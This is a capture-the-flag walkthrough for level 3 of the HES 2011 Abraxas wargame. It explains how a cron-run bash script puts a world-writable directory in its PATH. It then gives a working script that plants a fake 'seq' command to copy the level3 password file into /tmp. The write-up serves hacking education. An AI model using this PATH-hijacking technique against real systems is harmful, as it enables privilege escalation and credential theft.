[HES 2011] Abraxas Wargame - Level 3

Hello,

Level3, here we come!

Clues from the logbook:
- "she's currently testing with generated datasets."
- "The entire thing is written in bash and runs as a cronjob every 10 minutes."

We look at the cronjob to locate the script:

$ cat /etc/cron.d/lifesupport_process 

*/10 * * * *    level3 /home/level3/bin/lifesupport_process.sh &> /dev/null

We read it:

$ cat /home/level3/bin/lifesupport_process.sh
#!/bin/bash

datadir=/opt/lifesupportdata
scriptdir=/home/level3/bin/

PATH=$datadir:.:$scriptdir:$PATH

cd $scriptdir
. common.inc.sh

# life support stats
data=$($scriptdir/lifesupport_data.sh)

echo    "Orig:      $data"
echo -n "Sorted:    "; mysort $data
echo -n "Sum:       "; sum $data
echo -n "Average:   "; avg $data
echo -n "Max:       "; max $data
echo -n "Min:       "; min $data
echo -n "Cumulated: "; cumul $data

mmm, we can see datadir in PATH! Interesting.
Let's look at its perms:

$ ls -lash /opt/
total 16K
4.0K drwxr-xr-x  4 root root   4.0K 2011-04-06 10:54 .
4.0K drwxr-xr-x 21 root root   4.0K 2011-09-02 14:17 ..
4.0K drwx-wx--x  2 root level2 4.0K 2013-03-06 02:17 lifesupportdata
4.0K drwxr-xr-x  6 root root   4.0K 2011-04-05 00:07 workpackagebuilder

We can write to /opt/lifesupportdata!
So we can use PATH to redirect to out script.
I tried with echo but no luck, so when looking at lifesupport_data.sh:

$ cat /home/level3/bin/lifesupport_data.sh 
#!/bin/bash

# FIXME: There is no kernel module yet to retrieve life support data
# This script just spits out random data, so we can at least test the processing scripts

for i in `seq 1 10`;
do
  echo -n $((RANDOM % 100))
  echo -n " "
done
echo

seq work wonderfully, here is the exploit:

#!/bin/sh

cat << EOF > /opt/lifesupportdata/seq
#!/bin/sh

/bin/cat /etc/pass/level3 > /tmp/lvl3.pass
EOF

chmod a+x /opt/lifesupportdata/seq

And yes, the script run as whatever id you run it at, so you can do anything.
Now, you've just got to wait every 10 minutes ;).

Cheers,

m_101